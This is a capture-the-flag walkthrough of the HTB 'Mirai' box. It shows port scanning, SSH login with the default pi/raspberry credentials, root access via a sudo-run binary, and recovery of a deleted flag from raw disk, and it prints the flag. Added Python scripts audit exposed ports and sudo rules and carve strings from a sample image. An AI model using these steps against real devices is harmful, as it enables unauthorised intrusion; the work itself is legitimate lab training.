Redhalo

hack the box walkthrough – Mirai machine

New easy Linux HTB machine today: Mirai!

The stated difficulty is easy.. let's find out.

enumeration

Old habits die hard: let's start with our nmapAutomator scan:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.82.188 Full

Running a Full scan on 10.129.82.188

Host is likely running Linux

---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:41 EST
Initiating Parallel DNS resolution of 1 host. at 16:41
Completed Parallel DNS resolution of 1 host. at 16:41, 0.01s elapsed
Initiating Connect Scan at 16:41
Scanning 10.129.82.188 [65535 ports]
Discovered open port 22/tcp on 10.129.82.188
Discovered open port 53/tcp on 10.129.82.188
Discovered open port 80/tcp on 10.129.82.188
Warning: 10.129.82.188 giving up on port because retransmission cap hit (1).
Discovered open port 32400/tcp on 10.129.82.188
Connect Scan Timing: About 23.03% done; ETC: 16:43 (0:01:44 remaining)
Connect Scan Timing: About 44.31% done; ETC: 16:43 (0:01:17 remaining)
Discovered open port 1450/tcp on 10.129.82.188
Connect Scan Timing: About 67.48% done; ETC: 16:43 (0:00:44 remaining)
Discovered open port 32469/tcp on 10.129.82.188
Completed Connect Scan at 16:43, 136.87s elapsed (65535 total ports)
Nmap scan report for 10.129.82.188
Host is up (0.025s latency).
Not shown: 65089 closed ports, 440 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1450/tcp  open  dwf
32400/tcp open  plex
32469/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds

Making a script scan on extra ports: 1450, 32400, 32469

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:43 EST
Nmap scan report for 10.129.82.188
Host is up (0.029s latency).

PORT      STATE SERVICE VERSION
1450/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

---------------------Finished all Nmap scans---------------------
Completed in 2 minute(s) and 30 second(s)

We have quite a few ports open on this machine..
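Before touching any of these services it helps to turn the port table into something you can review: on a Pi-hole box the only services you expect are SSH, DNS and the web dashboard, so UPnP and a Plex server listening on the same host are findings in themselves. The script below is an added example, not part of the original post or of nmapAutomator; it parses nmap's normal-output port table (constructed here from the lines of the scan above) and flags anything outside an assumed allow-list of ssh/domain/http, or whose banner names a media stack.

```python
import re
from typing import Dict, List

# Constructed sample: the port table as nmap's normal output prints it,
# trimmed to the open ports from the scan above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.129.82.188
Host is up (0.025s latency).
Not shown: 65089 closed ports, 440 filtered ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1450/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
"""

# One port-table line: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumption for this example: a Pi-hole should expose only these services.
EXPECTED_ON_PIHOLE = {"ssh", "domain", "http"}
# Banner keywords that mean "media server", whatever nmap's service guess says.
MEDIA_MARKERS = ("plex", "upnp", "dlna")


def parse_nmap_ports(text: str) -> List[Dict[str, object]]:
    """Return one dict per open port: port (int), proto, service, version."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # headers, 'Host is up', banner lines etc.
        port, proto, state, service, version = m.groups()
        if state != "open":
            continue
        ports.append({"port": int(port), "proto": proto,
                      "service": service, "version": version or ""})
    return ports


def unexpected_exposures(ports: List[Dict[str, object]]) -> List[int]:
    """Ports outside the allow-list, or whose banner names a media stack."""
    flagged = []
    for p in ports:
        banner = f"{p['service']} {p['version']}".lower()
        if p["service"] not in EXPECTED_ON_PIHOLE or any(k in banner for k in MEDIA_MARKERS):
            flagged.append(p["port"])
    return flagged


if __name__ == "__main__":
    found = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    for p in found:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<8} {p['version']}")
    print("review these ports:", unexpected_exposures(found))
```

Port 32400 is reported by nmap as plain `http`; the banner check is what catches it as Plex, which is why the filter looks at the version string and not only at the service name.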

Let's start with port 80. Opening it in the web browser gave me a blank page, so I ran dirbuster to check whether any files or folders could be found.

The admin folder brings me to a Pi-hole dashboard.

Thanks to Google, I found the default SSH credentials for a Raspberry Pi: pi/raspberry.

[email protected]:~$ ssh pi@h10.129.82.188
ssh: Could not resolve hostname h10.129.82.188: Name or service not known
[email protected]:~$ ssh pi@10.129.82.188
pi@10.129.82.188's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

[email protected]:~ $ whoami
pi

Privilege Escalation

A linpeas scan showed me that the user pi is a member of the sudo group, and that I could use /tmp/shrndom with the sudo tokens exploit for privilege escalation.
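The root cause here is the combination of a default password and unrestricted sudo: on Debian-style systems `%sudo ALL=(ALL:ALL) ALL` gives every member of the sudo group full root. The audit below is an added example, not part of the original post or of linpeas; it parses constructed excerpts of /etc/group and /etc/sudoers (a Debian layout, with one extra hypothetical limited rule for contrast) and lists which accounts can run ALL commands as root, and through which rule. On a live box `sudo -l` answers the same question for the current user only.

```python
import re
from typing import Dict, List

# Constructed stand-ins for /etc/group and /etc/sudoers on a Raspbian/Pi-hole box.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:pi
pi:x:1000:
"""

SAMPLE_SUDOERS = """\
# constructed sudoers, Debian layout
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# hypothetical limited rule: not root-capable, must not be reported
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# "<user or %group>  <hosts>=(<runas>) [NOPASSWD:] <commands>"
SUDO_RULE = re.compile(r"^(%?\S+)\s+\S+=\(([^)]*)\)\s*(NOPASSWD:)?\s*(.+)$")


def parse_groups(group_text: str) -> Dict[str, List[str]]:
    """Map group name -> explicitly listed members (name:pw:gid:member,member)."""
    groups = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def parse_sudoers(sudoers_text: str) -> List[Dict[str, object]]:
    """Extract user/group rules; Defaults and comments are skipped."""
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        who, runas, nopasswd, commands = m.groups()
        rules.append({"who": who, "runas": runas.strip(),
                      "nopasswd": bool(nopasswd), "commands": commands.strip()})
    return rules


def root_capable_users(group_text: str, sudoers_text: str) -> Dict[str, Dict[str, object]]:
    """Users who may run ALL commands as root (directly or via a %group rule)."""
    groups = parse_groups(group_text)
    capable = {}
    for rule in parse_sudoers(sudoers_text):
        runas_user = rule["runas"].split(":")[0].strip()
        if rule["commands"] != "ALL" or runas_user not in ("ALL", "root"):
            continue
        if rule["who"].startswith("%"):
            users = groups.get(rule["who"][1:], [])
        else:
            users = [rule["who"]]
        for u in users:
            capable[u] = {"via": rule["who"], "nopasswd": rule["nopasswd"]}
    return capable


if __name__ == "__main__":
    for user, how in root_capable_users(SAMPLE_GROUP, SAMPLE_SUDOERS).items():
        pw = "without a password" if how["nopasswd"] else "with their own password"
        print(f"{user}: full root via rule '{how['via']}' {pw}")
```

The parser reads only explicit group members, so an account whose primary GID is the sudo group would be missed; a complete audit would also walk /etc/passwd and the `#include`/`@includedir` drop-ins under /etc/sudoers.d.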

[email protected]:~ $ sudo /tmp/shrndom
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Where is my flag?

Oh ok… I thought I was done here..

A new linpeas scan showed me the disk mounted on /media/usbstick.

# cd /media/usbstick
# ls -al
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Oh god.. what have you done, James?

So I ran the following command to recover the root.txt file:

# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
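Why this works: deleting a file on an ext2/3/4 volume only unlinks the directory entry and frees the inode and its blocks in the bitmaps; the data block itself is not wiped, and the name can linger in the directory block. `strings` simply walks the raw device and prints every run of printable bytes, so the deleted file's content shows up next to the file names and the last mount path that the superblock records. The script below is an added example, not from the original post; it builds a constructed four-block image standing in for /dev/sdb (a made-up 32-hex token, not the flag from the box), reimplements the `strings` walk with offsets, and reports where on the device each flag-shaped token sits, which is the forensic detail `strings` alone does not give you.

```python
import re
from typing import List, Tuple

BLOCK_SIZE = 1024  # the stick's directory is 1024 bytes long, i.e. 1 KiB ext blocks
FLAG_RE = re.compile(r"[0-9a-f]{32}")
# Constructed stand-in for the recovered flag; not the value from the box.
FAKE_FLAG = "0123456789abcdef0123456789abcdef"


def _block(payload: bytes) -> bytes:
    """Pad a payload to one filesystem block."""
    assert len(payload) <= BLOCK_SIZE
    return payload.ljust(BLOCK_SIZE, b"\x00")


def build_sample_image() -> bytes:
    """Constructed stand-in for /dev/sdb: superblock, directory, two data blocks."""
    # Block 0: superblock-ish noise plus the last-mounted path the superblock keeps.
    superblock = b"\xff" * 100 + b">r &\x00" + b"\xff" * 95 + b"/media/usbstick\x00"
    # Block 1: ext-style directory entries (inode, rec_len, name_len, type, name);
    # root.txt's entry is still here even though the file was unlinked.
    directory = (b"\x0b\x00\x00\x00\x14\x00\x0a\x02lost+found\x00\x00"
                 b"\x0c\x00\x00\x00\x10\x00\x08\x01root.txt"
                 b"\x0d\x00\x00\x00\x14\x00\x0a\x01damnit.txt")
    # Block 2: damnit.txt content (still allocated).
    note = (b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
            b"Do you know if there is any way to get them back?\n\n-James\n")
    # Block 3: the deleted root.txt's data block, freed in the bitmap but not erased.
    deleted = FAKE_FLAG.encode() + b"\n"
    return b"".join(_block(b) for b in (superblock, directory, note, deleted))


def carve_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str]]:
    """Like `strings`: runs of printable ASCII (space..~, tab) of >= min_len, with offsets."""
    found = []
    start = None
    for i, b in enumerate(data + b"\x00"):  # sentinel closes a run at end of data
        printable = 0x20 <= b <= 0x7E or b == 0x09
        if printable and start is None:
            start = i
        elif not printable and start is not None:
            if i - start >= min_len:
                found.append((start, data[start:i].decode("ascii")))
            start = None
    return found


def find_flag_candidates(data: bytes) -> List[Tuple[int, int, str]]:
    """(byte offset, block number, token) for every 32-hex-digit run on the device."""
    hits = []
    for offset, s in carve_strings(data):
        for m in FLAG_RE.finditer(s):
            abs_off = offset + m.start()
            hits.append((abs_off, abs_off // BLOCK_SIZE, m.group(0)))
    return hits


if __name__ == "__main__":
    image = build_sample_image()
    for offset, s in carve_strings(image):
        print(f"{offset:6d} (block {offset // BLOCK_SIZE}): {s}")
    for offset, blk, token in find_flag_candidates(image):
        print(f"flag-shaped token at offset {offset}, block {blk}: {token}")
```

To run this against a real device you would read it with `open("/dev/sdb", "rb")` (or better, a dd image of it) and pass the bytes to `find_flag_candidates`; the block number tells you which block to inspect, and whether it is marked free in the block bitmap, with a filesystem tool such as debugfs.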